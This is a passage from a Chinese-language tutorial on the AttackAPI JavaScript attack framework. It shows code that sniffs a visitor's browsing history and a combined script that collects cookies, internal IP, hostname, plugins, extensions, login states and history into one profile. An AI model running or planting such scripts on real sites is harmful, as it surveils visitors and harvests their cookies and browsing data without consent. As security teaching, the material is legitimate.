精通JavaScript攻击框架：AttackAPI（上）

核心提示： 欲了解如何为scanExtensios和scanStates函数编写特征码的更多信息，请访问AttackAPI主页，精通JavaScript攻击框架：AttackAPI（上）(7)，地址为www.gnucitizen.org/projects/attackapi，迄今为止，人们可以扫描大量

欲了解如何为scanExtensios和scanStates函数编写特征码的更多信息，请访问AttackAPI主页，地址为www.gnucitizen.org/projects/attackapi。

迄今为止，我们已经看到即使对AttackAPI的工作原理没有深入了解，也可以轻松地用它来完成的许多任务。我们这里要展示的最后一个函数将用来显示客户端浏览历史。让我们看看以下代码：

$A.scanHistory({onfound: function(url) {
console.log(url);
}});

通过上述代码，就可以查看最近访问的位于AttackAPI特征数据库中所有站点。就像其他扫描函数一样，您可以指定自己的要扫描的浏览历史列表，如下所示：

$A.scanHistory({onfound: function(url) {
console.log(url);
}, urls: [‘http://www.google.com’, ‘http://www.gnucitizen.org’]});

需要注意的是，虽然攻击者可以将该技术用于恶意目的，但是有些情况下它也有好的一面。例如，为了调查取证，人们可以扫描大量用户以识别访问过可疑站点的个人。

让我们看看如何使用上面所有这些函数来对用户进行全面的调查。在代码片断之后，我们还列出了收集到的各种信息：

var data = {
agent: $A.getAgent(),
platform: $A.getPlatform(),
cookies: $A.getCookies(),
plugins: $A.getPlugins(),
ip: $A.getInternalIP(),
hostname: $A.getInternalHostname(),
extensions: [],
states: [],
history: []};
var completed = 0;
$A.scanExtensions({
onfound: function (signature) {
data.extensions.push(signature.name);
},
oncomplete: function () {
completed += 1;
}
});
$A.scanStates({
onfound: function (signature) {
data.states.push(signature.name);
},
oncomplete: function () {
completed += 1;
}
});
$A.scanHistory({
onfound: function (url) {
data.history.push(url);
},
oncomplete: function () {
completed += 1;
}
});
var tmr = window.setInterval(function () {
if (completed < 3)
return;
console.dir(data);
window.clearInterval(tmr);
}, 1000);